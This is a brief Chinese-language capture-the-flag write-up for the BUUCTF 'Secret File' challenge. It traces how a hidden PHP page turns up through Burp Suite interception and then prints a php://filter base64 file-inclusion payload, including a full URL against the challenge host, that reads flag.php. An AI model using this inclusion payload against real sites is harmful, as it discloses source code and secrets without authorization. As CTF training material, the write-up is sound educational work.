BUUCTF之[极客大挑战 2019]Secret File

1.题:
BUUCTF之[极客大挑战 2019]Secret File_第1张图片

2.题样:

BUUCTF之[极客大挑战 2019]Secret File_第2张图片

3.发现一个Archive room.php:
BUUCTF之[极客大挑战 2019]Secret File_第3张图片

4.绝密档案:
BUUCTF之[极客大挑战 2019]Secret File_第4张图片

点了select后什么都没有,估计藏起来了。BUUCTF之[极客大挑战 2019]Secret File_第5张图片BUUCTF之[极客大挑战 2019]Secret File_第6张图片

BP抓包,重新点select后发现一个php:
BUUCTF之[极客大挑战 2019]Secret File_第7张图片

访问试试:
BUUCTF之[极客大挑战 2019]Secret File_第8张图片

5.代码审计:
highlight_file函数
strstr
stristr
文件包含,php伪协议,base64解密:
http://fdd4d84b-eead-40b9-ade9-df8198622912.node3.buuoj.cn/secr3t.php?file=php://filter/read=convert.base64-encode/resource=./flag.php
php://filter/read=convert.base64-encode/resource=./flag.php
BUUCTF之[极客大挑战 2019]Secret File_第9张图片BUUCTF之[极客大挑战 2019]Secret File_第10张图片

你可能感兴趣的:(CTF)